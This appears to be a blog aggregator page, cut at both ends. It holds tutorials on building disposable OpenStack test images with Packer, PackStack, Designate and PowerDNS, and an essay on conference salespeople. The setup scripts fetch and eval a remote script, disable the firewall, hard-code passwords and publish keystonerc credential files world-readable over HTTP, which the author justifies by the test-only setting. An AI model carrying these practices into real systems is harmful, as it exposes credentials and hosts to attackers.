  pushd ~/go/src/github.com/gophercloud/gophercloud
  go get -u ./...
  popd

  cat >> /root/.bashrc <<EOF
  if [[ -f /usr/local/bin/gimme ]]; then
    eval "\$(/usr/local/bin/gimme 1.8)"
    export GOPATH=\$HOME/go
    export PATH=\$PATH:\$GOROOT/bin:\$GOPATH/bin
  fi

  gophercloudtest() {
    if [[ -n \$1 ]] && [[ -n \$2 ]]; then
      pushd  ~/go/src/github.com/gophercloud/gophercloud
      go test -v -tags "fixtures acceptance" -run "\$1" github.com/gophercloud/gophercloud/acceptance/openstack/\$2 | tee ~/gophercloud.log
      popd
    fi
  }
  EOF

  systemctl stop openstack-cinder-backup.service
  systemctl stop openstack-cinder-scheduler.service
  systemctl stop openstack-cinder-volume.service
  systemctl stop openstack-nova-cert.service
  systemctl stop openstack-nova-compute.service
  systemctl stop openstack-nova-conductor.service
  systemctl stop openstack-nova-consoleauth.service
  systemctl stop openstack-nova-novncproxy.service
  systemctl stop openstack-nova-scheduler.service
  systemctl stop neutron-dhcp-agent.service
  systemctl stop neutron-l3-agent.service
  systemctl stop neutron-lbaasv2-agent.service
  systemctl stop neutron-metadata-agent.service
  systemctl stop neutron-openvswitch-agent.service
  systemctl stop neutron-metering-agent.service

  mysql -e "update services set deleted_at=now(), deleted=id" cinder
  mysql -e "update services set deleted_at=now(), deleted=id" nova
  mysql -e "update compute_nodes set deleted_at=now(), deleted=id" nova
  for i in $(openstack network agent list -c ID -f value); do
    neutron agent-delete $i
  done

  systemctl stop httpd

  cp /home/centos/files/rc.local /etc
  chmod +x /etc/rc.local

There are four things begin done above:

  1. A MySQL database is created for PowerDNS.
  2. PowerDNS is then installed.
  3. A configuration file is created.
  4. A database schema is imported into the PowerDNS database.

You'll notice the schema is located in a file titled files/pdns.sql. Add the following to terraform-openstack-test/packer/files/pdns.sql:

CREATE TABLE domains (
  id                    INT AUTO_INCREMENT,
  name                  VARCHAR(255) NOT NULL,
  master                VARCHAR(128) DEFAULT NULL,
  last_check            INT DEFAULT NULL,
  type                  VARCHAR(6) NOT NULL,
  notified_serial       INT DEFAULT NULL,
  account               VARCHAR(40) DEFAULT NULL,
  PRIMARY KEY (id)
) Engine=InnoDB;

CREATE UNIQUE INDEX name_index ON domains(name);


CREATE TABLE records (
  id                    BIGINT AUTO_INCREMENT,
  domain_id             INT DEFAULT NULL,
  name                  VARCHAR(255) DEFAULT NULL,
  type                  VARCHAR(10) DEFAULT NULL,
  content               VARCHAR(64000) DEFAULT NULL,
  ttl                   INT DEFAULT NULL,
  prio                  INT DEFAULT NULL,
  change_date           INT DEFAULT NULL,
  disabled              TINYINT(1) DEFAULT 0,
  ordername             VARCHAR(255) BINARY DEFAULT NULL,
  auth                  TINYINT(1) DEFAULT 1,
  PRIMARY KEY (id)
) Engine=InnoDB;

CREATE INDEX nametype_index ON records(name,type);
CREATE INDEX domain_id ON records(domain_id);
CREATE INDEX recordorder ON records (domain_id, ordername);


CREATE TABLE supermasters (
  ip                    VARCHAR(64) NOT NULL,
  nameserver            VARCHAR(255) NOT NULL,
  account               VARCHAR(40) NOT NULL,
  PRIMARY KEY (ip, nameserver)
) Engine=InnoDB;


CREATE TABLE comments (
  id                    INT AUTO_INCREMENT,
  domain_id             INT NOT NULL,
  name                  VARCHAR(255) NOT NULL,
  type                  VARCHAR(10) NOT NULL,
  modified_at           INT NOT NULL,
  account               VARCHAR(40) NOT NULL,
  comment               VARCHAR(64000) NOT NULL,
  PRIMARY KEY (id)
) Engine=InnoDB;

CREATE INDEX comments_domain_id_idx ON comments (domain_id);
CREATE INDEX comments_name_type_idx ON comments (name, type);
CREATE INDEX comments_order_idx ON comments (domain_id, modified_at);


CREATE TABLE domainmetadata (
  id                    INT AUTO_INCREMENT,
  domain_id             INT NOT NULL,
  kind                  VARCHAR(32),
  content               TEXT,
  PRIMARY KEY (id)
) Engine=InnoDB;

CREATE INDEX domainmetadata_idx ON domainmetadata (domain_id, kind);


CREATE TABLE cryptokeys (
  id                    INT AUTO_INCREMENT,
  domain_id             INT NOT NULL,
  flags                 INT NOT NULL,
  active                BOOL,
  content               TEXT,
  PRIMARY KEY(id)
) Engine=InnoDB;

CREATE INDEX domainidindex ON cryptokeys(domain_id);


CREATE TABLE tsigkeys (
  id                    INT AUTO_INCREMENT,
  name                  VARCHAR(255),
  algorithm             VARCHAR(50),
  secret                VARCHAR(255),
  PRIMARY KEY (id)
) Engine=InnoDB;

CREATE UNIQUE INDEX namealgoindex ON tsigkeys(name, algorithm);

Installing Designate

Now that deploy.sh will install and configure PowerDNS, add the steps to install and configure Designate:

  hostnamectl set-hostname localhost

  systemctl disable firewalld
  systemctl stop firewalld
  systemctl disable NetworkManager
  systemctl stop NetworkManager
  systemctl enable network
  systemctl start network

  yum install -y https://repos.fedorapeople.org/repos/openstack/openstack-ocata/rdo-release-ocata-3.noarch.rpm
  yum install -y centos-release-openstack-ocata
  yum-config-manager --enable openstack-ocata
  yum update -y
  yum install -y openstack-packstack
  packstack --answer-file /home/centos/files/packstack-answers.txt

  source /root/keystonerc_admin
  nova flavor-create m1.acctest 99 512 5 1 --ephemeral 10
  nova flavor-create m1.resize 98 512 6 1 --ephemeral 10
  _NETWORK_ID=$(openstack network show private -c id -f value)
  _SUBNET_ID=$(openstack subnet show private_subnet -c id -f value)
  _EXTGW_ID=$(openstack network show public -c id -f value)
  _IMAGE_ID=$(openstack image show cirros -c id -f value)

  echo "" >> /root/keystonerc_admin
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_admin
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_admin
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_admin
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_admin
  echo export OS_POOL_NAME="public" >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_admin
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_admin
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_admin
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_admin
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_admin

  echo "" >> /root/keystonerc_demo
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_demo
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_demo
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_demo
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_demo
  echo export OS_POOL_NAME="public" >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_demo
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_demo
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_demo
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_demo
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_demo

  mysql -e "CREATE DATABASE pdns default character set utf8 default collate utf8_general_ci"
  mysql -e "GRANT ALL PRIVILEGES ON pdns.* TO 'pdns'@'localhost' IDENTIFIED BY 'password'"

  yum install -y epel-release yum-plugin-priorities
  curl -o /etc/yum.repos.d/powerdns-auth-40.repo https://repo.powerdns.com/repo-files/centos-auth-40.repo
  yum install -y pdns pdns-backend-mysql

  echo "daemon=no
  allow-recursion=127.0.0.1
  config-dir=/etc/powerdns
  daemon=yes
  disable-axfr=no
  guardian=yes
  local-address=0.0.0.0
  local-ipv6=::
  local-port=53
  setgid=pdns
  setuid=pdns
  slave=yes
  socket-dir=/var/run
  version-string=powerdns
  out-of-zone-additional-processing=no
  webserver=yes
  api=yes
  api-key=someapikey
  launch=gmysql
  gmysql-host=127.0.0.1
  gmysql-user=pdns
  gmysql-dbname=pdns
  gmysql-password=password" | tee /etc/pdns/pdns.conf

  mysql pdns < /home/centos/files/pdns.sql
  sudo systemctl restart pdns

+ openstack user create --domain default --password password designate
+ openstack role add --project services --user designate admin
+ openstack service create --name designate --description "DNS" dns
+ openstack endpoint create --region RegionOne dns public http://127.0.0.1:9001/
+
+ mysql -e "CREATE DATABASE designate CHARACTER SET utf8 COLLATE utf8_general_ci"
+ mysql -e "CREATE DATABASE designate_pool_manager"
+ mysql -e "GRANT ALL PRIVILEGES ON designate.* TO 'designate'@'localhost' IDENTIFIED BY 'password'"
+ mysql -e "GRANT ALL PRIVILEGES ON designate_pool_manager.* TO 'designate'@'localhost' IDENTIFIED BY 'password'"
+ mysql -e "GRANT ALL PRIVILEGES ON designate.* TO 'designate'@'localhost' IDENTIFIED BY 'password'"
+
+ yum install -y crudini
+
+ yum install -y openstack-designate\*
+
+ cp /home/centos/files/pools.yaml /etc/designate/
+
+ designate_conf="/etc/designate/designate.conf"
+ crudini --set $designate_conf DEFAULT debug True
+ crudini --set $designate_conf DEFAULT debug True
+ crudini --set $designate_conf DEFAULT notification_driver messaging
+ crudini --set $designate_conf service:api enabled_extensions_v2 "quotas, reports"
+ crudini --set $designate_conf keystone_authtoken auth_uri http://127.0.0.1:5000
+ crudini --set $designate_conf keystone_authtoken auth_url http://127.0.0.1:35357
+ crudini --set $designate_conf keystone_authtoken username designate
+ crudini --set $designate_conf keystone_authtoken password password
+ crudini --set $designate_conf keystone_authtoken project_name services
+ crudini --set $designate_conf keystone_authtoken auth_type password
+ crudini --set $designate_conf service:worker enabled true
+ crudini --set $designate_conf service:worker notify true
+ crudini --set $designate_conf storage:sqlalchemy connection mysql+pymysql://designate:password@127.0.0.1/designate
+
+ sudo -u designate designate-manage database sync
+
+ systemctl enable designate-central designate-api
+ systemctl enable designate-worker designate-producer designate-mdns
+ systemctl restart designate-central designate-api
+ systemctl restart designate-worker designate-producer designate-mdns
+
+ sudo -u designate designate-manage pool update

  yum install -y wget git
  wget -O /usr/local/bin/gimme https://raw.githubusercontent.com/travis-ci/gimme/master/gimme
  chmod +x /usr/local/bin/gimme
  eval "$(/usr/local/bin/gimme 1.8)"
  export GOPATH=$HOME/go
  export PATH=$PATH:$GOROOT/bin:$GOPATH/bin

  go get github.com/gophercloud/gophercloud
  pushd ~/go/src/github.com/gophercloud/gophercloud
  go get -u ./...
  popd

  cat >> /root/.bashrc <<EOF
  if [[ -f /usr/local/bin/gimme ]]; then
    eval "\$(/usr/local/bin/gimme 1.8)"
    export GOPATH=\$HOME/go
    export PATH=\$PATH:\$GOROOT/bin:\$GOPATH/bin
  fi

  gophercloudtest() {
    if [[ -n \$1 ]] && [[ -n \$2 ]]; then
      pushd  ~/go/src/github.com/gophercloud/gophercloud
      go test -v -tags "fixtures acceptance" -run "\$1" github.com/gophercloud/gophercloud/acceptance/openstack/\$2 | tee ~/gophercloud.log
      popd
    fi
  }
  EOF

  systemctl stop openstack-cinder-backup.service
  systemctl stop openstack-cinder-scheduler.service
  systemctl stop openstack-cinder-volume.service
  systemctl stop openstack-nova-cert.service
  systemctl stop openstack-nova-compute.service
  systemctl stop openstack-nova-conductor.service
  systemctl stop openstack-nova-consoleauth.service
  systemctl stop openstack-nova-novncproxy.service
  systemctl stop openstack-nova-scheduler.service
  systemctl stop neutron-dhcp-agent.service
  systemctl stop neutron-l3-agent.service
  systemctl stop neutron-lbaasv2-agent.service
  systemctl stop neutron-metadata-agent.service
  systemctl stop neutron-openvswitch-agent.service
  systemctl stop neutron-metering-agent.service
+ systemctl stop designate-central designate-api
+ systemctl stop designate-worker designate-producer designate-mdns

  mysql -e "update services set deleted_at=now(), deleted=id" cinder
  mysql -e "update services set deleted_at=now(), deleted=id" nova
  mysql -e "update compute_nodes set deleted_at=now(), deleted=id" nova
  for i in $(openstack network agent list -c ID -f value); do
    neutron agent-delete $i
  done

  systemctl stop httpd

  cp /home/centos/files/rc.local /etc
  chmod +x /etc/rc.local

There are several steps happening above:

  1. The openstack command is used to create a new service account called designate. A catalog endpoint is also created.
  2. A database called designate is created.
  3. A utility called crudini is installed. This is an amazing little tool to help modify ini files on the command-line.
  4. Designate is installed.
  5. A bundled pools.yaml file is copied to /etc/designate. I'll show the contents of this file soon.
  6. crudini is used to configure /etc/designate/designate.conf.
  7. The Designate database's schema is imported using the designate-manage command.
  8. The Designate services are enabled in systemd.
  9. designate-manage is again used, this time to update the DNS pools.
  10. The Designate services are added to the list of services to stop before the image/snapshot is created.

These steps roughly follow what was pulled from the Designate Installation Guide linked to earlier.

As mentioned, a pools.yaml file is copied from the files directory. Create a file called terraform-openstack-test/packer/files/pools.yaml with the following contents:

---

- name: default
  description: Default PowerDNS Pool
  attributes: {}
  ns_records:
    - hostname: ns.example.com.
      priority: 1

  nameservers:
    - host: 127.0.0.1
      port: 53

  targets:
    - type: pdns4
      description: PowerDNS4 DNS Server
      masters:
        - host: 127.0.0.1
          port: 5354

      # PowerDNS Configuration options
      options:
        host: 127.0.0.1
        port: 53
        api_endpoint: http://127.0.0.1:8081
        api_token: someapikey

Finally, modify the rc.local file:

  #!/bin/bash
  set -x

  export HOME=/root

  sleep 60

  public_ip=$(curl http://169.254.169.254/latest/meta-data/public-ipv4/)
  if [[ -n $public_ip ]]; then
    while true ; do
      mysql -e "update endpoint set url = replace(url, '127.0.0.1', '$public_ip')" keystone
      if [[ $? == 0 ]]; then
        break
      fi
      sleep 10
    done

    sed -i -e "s/127.0.0.1/$public_ip/g" /root/keystonerc_demo
    sed -i -e "s/127.0.0.1/$public_ip/g" /root/keystonerc_admin
  fi

  systemctl restart rabbitmq-server
  while [[ true ]]; do
    pgrep -f rabbit
    if [[ $? == 0 ]]; then
      break
    fi
    sleep 10
    systemctl restart rabbitmq-server
  done

  systemctl restart openstack-cinder-api.service
  systemctl restart openstack-cinder-backup.service
  systemctl restart openstack-cinder-scheduler.service
  systemctl restart openstack-cinder-volume.service
  systemctl restart openstack-nova-cert.service
  systemctl restart openstack-nova-compute.service
  systemctl restart openstack-nova-conductor.service
  systemctl restart openstack-nova-consoleauth.service
  systemctl restart openstack-nova-novncproxy.service
  systemctl restart openstack-nova-scheduler.service
  systemctl restart neutron-dhcp-agent.service
  systemctl restart neutron-l3-agent.service
  systemctl restart neutron-lbaasv2-agent.service
  systemctl restart neutron-metadata-agent.service
  systemctl restart neutron-openvswitch-agent.service
  systemctl restart neutron-metering-agent.service
  systemctl restart httpd
+ systemctl restart designate-central designate-api
+ systemctl restart designate-worker designate-producer designate-mdns
+ systemctl restart pdns

  nova-manage cell_v2 discover_hosts

+ sudo -u designate designate-manage pool update
+
+ iptables -I INPUT -p tcp --dport 9001 -j ACCEPT
+ ip6tables -I INPUT -p tcp --dport 9001 -j ACCEPT
+
  iptables -I INPUT -p tcp --dport 80 -j ACCEPT
  ip6tables -I INPUT -p tcp --dport 80 -j ACCEPT
  cp /root/keystonerc* /var/www/html
  chmod 666 /var/www/html/keystonerc*

The above steps have been added:

  1. The Designate services have been added to the list of services to be restarted during boot.
  2. PowerDNS is also restarted
  3. designate-manage is again used to update the DNS pools.
  4. Port 9001 is opened for traffic.

Build the Image and Launch

With the above in place, you can regenerate your image using Packer and then launch a virtual machine using Terraform.

When the virtual machine is up and running, you'll find that your testing environment is now running OpenStack Designate.

Conclusion

This blog post covered how to add a service to your OpenStack testing environment that is not supported by PackStack. This was done by reviewing the steps to manually install and configure the service, translating those steps to automated commands, and adding those commands to the existing deployment scripts.

October 09, 2017 06:00 AM

October 08, 2017

Everything Sysadmin

Vendor jerks at tech conferences

(I've intentionally delayed posting this so that it wasn't clear which conference I'm talking about.)

So... I'm at a conference. I take a break from the talks to walk around the vendor show. While most of the booths are selling products I'm not interested in, I suddenly find myself in front of VENDOR-A (name changed to protect them). VENDOR-A makes a product that has both open source and commercial editions, a common business model. Since the company I work for is a happy user of their open source version, I decide to ask about the commercial version. Maybe there's some benefit to be had.

The salesperson turned red in the face and became very indignant.

What?

What did I do wrong?

I'm totally confused.

Not wanting to cause a scene, I politely ended the conversation and walked away. Jerk.

Well, maybe not "jerk". Maybe he just hadn't eaten lunch and was hangry, or maybe he was having a bad day. Or maybe his mom's name is "open source" and he thought I was insulting her. I have no idea.

I was trying to be as polite as possible. It was a "take my money!" situation and the salesperson blew it.

Anyway... I had plenty more to see in the vendor show so I kept walking.

So... then I saw VENDOR-B. VENDOR-B (again, not their actual name) is another vendor who's open source product we're very happy with. Let's try the same thing.

"Yes, yes, thank you. I'm a big fan of your product already. You don't need to convince me. However, we use the open source version now. What benefits would I gain from the commercial version?"

Again this salesperson also turned red in the face and got vitriolic. I, again, stand there totally confused.

So, again, I politely ended the conversation and walked away.

I assure you, reader, that I didn't phrase it as, "This is stupid. Why would I pay?" or anything close to that. Quite the opposite, actually.

The worst answer I was expecting was, "it is the same but you get world-class support". Why I may disagree with their self-appraisal of how good their support is, at least it would have been an answer. However, both companies exceeded expectations and took my question as an insult.

I don't think either of these salespeople understand what business they are in.

Let me explain to you the economic model of commercial and open source software.

With commercial software, you sell to someone that isn't using your product. You have to convince them that they have a need, what your product does, that your product fills their need, and that they should buy the product. That's the traditional selling model.

sales-process-commercial.png

Open source software is sold differently. The person already is using the product. They already know how awesome it is. They already know it fulfills their need. The salesperson merely has to convince them that there would be added benefits to paying for it.

sales-process-floss.png

Think about how radical this is! The customer is already happy and you, the salesperson, have the opportunity to make them even more happier. There's no need to grandstand (or lie) about what the product can and can't do, because the customer already uses it. This is a much more transparent and cooperative arrangement. It is better for the customer and you.

This also means that your ability to sell the product is as wide as the existing community. The bigger the community, the more selling opportunities. Having good community liaisons, advocates, etc. grows that base. Hosting a conference grows that base. These things aren't just good for your community, but they are good for your salespeople because they increase the pool of potential new paying customers.

A salesperson that meets someone who uses the free/community/open source edition should be super excited at the opportunity to speak with a committed user who can be turned into a paying customer.

The reaction I got from those salespeople says to me that they didn't understand this.

What business did they think they are in?

by Tom Limoncelli at October 08, 2017 09:00 PM

October 07, 2017

Joe Topjian

Building OpenStack Environments Part 2

Introduction

In the last post, I detailed how to create an all-in-one OpenStack environment in an isolated virtual machine for the purpose of testing OpenStack-based applications.

In this post, I'll cover how to create an image from the environment. This will allow you to launch virtual machines which already have the OpenStack environment installed and running. The benefits of this approach is that it reduces the time required to build the environment as well as pins the environment to a known working version.

In addition, I'll cover how to modify the all-in-one environment so that it can be accessed remotely. This way, testing does not have to be done locally on the virtual machine.

Note: I realize the title of this series might be a misnomer. This series is is not covering how to deploy OpenStack in general, but how to set up disposable OpenStack environments for testing purposes. Blame line wrapping.

How to Generate the Image

AWS and OpenStack (and any other cloud provider) provide the ability to create an image (whether AMI, qcow, etc) from a running virtual machine. This is commonly known as "snapshotting".

The process described here will use snapshotting, but it's not that simple. OpenStack has a lot of moving pieces and some of those pieces are dependent on unique configurations of the host: the hostname, the IP address(es), etc. These items must be accounted for and configured correctly on the new virtual machine.

With this in mind, the process of generating an image is roughly:

  1. Launch a virtual machine.
  2. Install an all-in-one OpenStack environment.
  3. Remove any unique information from the OpenStack databases.
  4. Snapshot.
  5. Upon creation of a new virtual machine, ensure OpenStack knows about the new unique information.

Creating a Reusable OpenStack Image

Just like in Part 1, it's best to ensure this entire process is automated. Terraform works great to provision and deploy infrastructure, but it is not suited to provide a niche task such as snapshotting.

Fortunately, there's Packer. And even more fortunate is that Packer supports a wide array of cloud services.

If you haven't used Packer before, I recommend going through the intro before proceeding here.

In Part 1, I used AWS as the cloud being deployed to. For this part, I'll switch things up and use an OpenStack cloud.

Creating a Simple Image

To begin, you can continue using the same terraform-openstack-test directory that was used in Part 1.

First, create a new directory called packer/openstack:

$ pwd
/home/jtopjian/terraform-openstack-test
$ mkdir -p packer/openstack
$ cd packer/openstack

Next, create a file called build.json with the following contents:


{
  "builders": [{
    "type": "openstack",
    "image_name": "packstack-ocata",
    "reuse_ips": true,
    "ssh_username": "centos",

    "flavor": "{{user `flavor`}}",
    "security_groups": ["{{user `secgroup`}}"],
    "source_image": "{{user `image_id`}}",
    "floating_ip_pool": "{{user `pool`}}",
    "networks": ["{{user `network_id`}}"]
  }]
}

I've broken the above into two sections: the top section has hard-coded values while the bottom section requires input on the command-line. This is because the values will vary between your OpenStack cloud and my OpenStack cloud.

With the above in place, run:

$ packer build \
    -var 'flavor=m1.large' \
    -var 'secgroup=AllowAll' \
    -var 'image_id=9abadd38-a33d-44c2-8356-b8b8ae184e04' \
    -var 'pool=public' \
    -var 'network_id=b0b12e8f-a695-480e-9dc2-3dc8ac2d55fd' \
    build.json

Note the following: the image_id must be a CentOS 7 image and the Security Group must allow traffic from your workstation to Port 22.

This command will take some time to complete. When it has finished, it will print the UUID of a newly generated image:

==> Builds finished. The artifacts of successful builds are:
--> openstack: An image was created: 53ecc829-60c0-4a87-81f4-9fc603ff2a8f

That UUID will point to an image titled "packstack-ocata".

Congratulations! You just created an image.

However, there is virtually nothing different about "packstack-ocata" and the CentOS image used to create it. All Packer did was launch a virtual machine and create a snapshot of it.

In order for Packer to make changes to the virtual machine, you must configure "provisioners" in the build.json file. Provisioners are just like Terraform's concept of provisioners: steps that will execute commands on the running virtual machine. Before you can add some provisioners to the Packer build file, you first need to generate the scripts which will be run.

Generating an Answer File

In Part 1, PackStack was used to install an all-in-one OpenStack environment. The command used was:

$ packstack --allinone

This very simple command will use a lot of sane defaults and the result will be a fully functionall all-in-one environment.

However, in order to more easily make the OpenStack environment run correctly each time a virtual machine is created, the installation needs tuned. To do this, a custom "answer file" will be used when running PackStack.

An answer file is a file which contains each configurable setting within PackStack. This file is very large with lots of options. It's not something you want to write from scratch. Instead, PackStack can generate an answer file to be used as a template.

On a CentOS 7 virtual machine, which can even be the same virtual machine you created in Part 1, run:

$ packstack --gen-answer-file=packstack-answers.txt

Copy the file to your workstation using scp or some other means. Make a directory called files to store this answer file:

$ pwd
/home/jtopjian/terraform-openstack-test
$ mkdir packer/files
$ scp -i key/id_rsa centos@<ip>:packstack-answers.txt packer/files

Once stored locally, make the following changes:

First, locate the setting CONFIG_CONTROLLER_HOST. This setting will have the value of an IP address local to the virtual machine which generated this file:

CONFIG_CONTROLLER_HOST=10.41.8.200

Do a global search and replace of 10.41.8.200 with 127.0.0.1.

Next, use this opportunity to tune which services you want to enable for your test environment. For example:

- CONFIG_HORIZON_INSTALL=y
+ CONFIG_HORIZON_INSTALL=n
- CONFIG_CEILOMETER_INSTALL=y
+ CONFIG_CEILOMETER_INSTALL=n
- CONFIG_AODH_INSTALL=y
+ CONFIG_AODH_INSTALL=n
- CONFIG_GNOCCHI_INSTALL=y
+ CONFIG_GNOCCHI_INSTALL=n
- CONFIG_LBAAS_INSTALL=n
+ CONFIG_LBAAS_INSTALL=y
- CONFIG_NEUTRON_FWAAS=n
+ CONFIG_NEUTRON_FWAAS=y

These are all services I have personally changed the status of since either they are disabled by default and I want them enabled or they are enabled by default and I do not need them. Change the values to suit your needs.

You might notice that there are several embedded passwords and secrets in this answer file. Astute readers will realize that these passwords will all be used for every virtual machine created with this answer file. For production use, this is most definitely not secure. However, I consider this relatively safe since these OpenStack environments are temporary and only for testing.

Installing OpenStack

Next, begin building a deploy.sh script. You can re-use the deploy.sh script from Part 1 as a start, with one initial change:

  systemctl disable firewalld
  systemctl stop firewalld
  systemctl disable NetworkManager
  systemctl stop NetworkManager
  systemctl enable network
  systemctl start network

  yum install -y https://repos.fedorapeople.org/repos/openstack/openstack-ocata/rdo-release-ocata-3.noarch.rpm
  yum install -y centos-release-openstack-ocata
  yum-config-manager --enable openstack-ocata
  yum update -y
  yum install -y openstack-packstack
- packstack --allinone
+ packstack --answer-file /home/centos/files/packstack-answers.txt

  source /root/keystonerc_admin
  nova flavor-create m1.acctest 99 512 5 1 --ephemeral 10
  nova flavor-create m1.resize 98 512 6 1 --ephemeral 10
  _NETWORK_ID=$(openstack network show private -c id -f value)
  _SUBNET_ID=$(openstack subnet show private_subnet -c id -f value)
  _EXTGW_ID=$(openstack network show public -c id -f value)
  _IMAGE_ID=$(openstack image show cirros -c id -f value)

  echo "" >> /root/keystonerc_admin
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_admin
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_admin
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_admin
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_admin
  echo export OS_POOL_NAME="public" >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_admin
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_admin
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_admin
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_admin
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_admin

  echo "" >> /root/keystonerc_demo
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_demo
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_demo
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_demo
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_demo
  echo export OS_POOL_NAME="public" >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_demo
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_demo
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_demo
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_demo
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_demo

  yum install -y wget git
  wget -O /usr/local/bin/gimme https://raw.githubusercontent.com/travis-ci/gimme/master/gimme
  chmod +x /usr/local/bin/gimme
  eval "$(/usr/local/bin/gimme 1.8)"
  export GOPATH=$HOME/go
  export PATH=$PATH:$GOROOT/bin:$GOPATH/bin

  go get github.com/gophercloud/gophercloud
  pushd ~/go/src/github.com/gophercloud/gophercloud
  go get -u ./...
  popd

  cat >> /root/.bashrc <<EOF
  if [[ -f /usr/local/bin/gimme ]]; then
    eval "\$(/usr/local/bin/gimme 1.8)"
    export GOPATH=\$HOME/go
    export PATH=\$PATH:\$GOROOT/bin:\$GOPATH/bin
  fi

  gophercloudtest() {
    if [[ -n \$1 ]] && [[ -n \$2 ]]; then
      pushd  ~/go/src/github.com/gophercloud/gophercloud
      go test -v -tags "fixtures acceptance" -run "\$1" github.com/gophercloud/gophercloud/acceptance/openstack/\$2 | tee ~/gophercloud.log
      popd
    fi
  }
  EOF

Next, alter packer/openstack/build.json with the following:


  {
    "builders": [{
      "type": "openstack",
      "image_name": "packstack-ocata",
      "reuse_ips": true,
      "ssh_username": "centos",

      "flavor": "{{user `flavor`}}",
      "security_groups": ["{{user `secgroup`}}"],
      "source_image": "{{user `image_id`}}",
      "floating_ip_pool": "{{user `pool`}}",
      "networks": ["{{user `network_id`}}"]
-   }]
+   }],
+   "provisioners": [
+     {
+       "type": "file",
+       "source": "../files",
+       "destination": "/home/centos/files"
+     },
+     {
+       "type": "shell",
+       "inline": [
+         "sudo bash /home/centos/files/deploy.sh"
+       ]
+     }
+   ]
  }

There are two provisioners being created here: one which will copy the files directory to /home/centos/files and one to run the deploy.sh script.

files was created outside of the openstack directory because these files are not unique to OpenStack. You can use the same files to build images in other clouds. For example, create a packer/aws directory and create a similar build.json file for AWS.

With that in place, run… actually, don't run yet. I'll save you a step. While the current configuration will launch an instance, install an all-in-one OpenStack environment, and create a snapshot, OpenStack will not work correctly when you create a virtual machine based on that image.

In order for it to work correctly, there are some more modifications which need made to make sure OpenStack starts correctly on a new virtual machine.

Removing Unique Data

In order to remove the unique data of the OpenStack environment, add the following to deploy.sh:

+ hostnamectl set-hostname localhost
+
  systemctl disable firewalld
  systemctl stop firewalld
  systemctl disable NetworkManager
  systemctl stop NetworkManager
  systemctl enable network
  systemctl start network

  yum install -y https://repos.fedorapeople.org/repos/openstack/openstack-ocata/rdo-release-ocata-3.noarch.rpm
  yum install -y centos-release-openstack-ocata
  yum-config-manager --enable openstack-ocata
  yum update -y
  yum install -y openstack-packstack
  packstack --answer-file /home/centos/files/packstack-answers.txt

  source /root/keystonerc_admin
  nova flavor-create m1.acctest 99 512 5 1 --ephemeral 10
  nova flavor-create m1.resize 98 512 6 1 --ephemeral 10
  _NETWORK_ID=$(openstack network show private -c id -f value)
  _SUBNET_ID=$(openstack subnet show private_subnet -c id -f value)
  _EXTGW_ID=$(openstack network show public -c id -f value)
  _IMAGE_ID=$(openstack image show cirros -c id -f value)

  echo "" >> /root/keystonerc_admin
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_admin
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_admin
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_admin
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_admin
  echo export OS_POOL_NAME="public" >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_admin
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_admin
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_admin
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_admin
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_admin

  echo "" >> /root/keystonerc_demo
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_demo
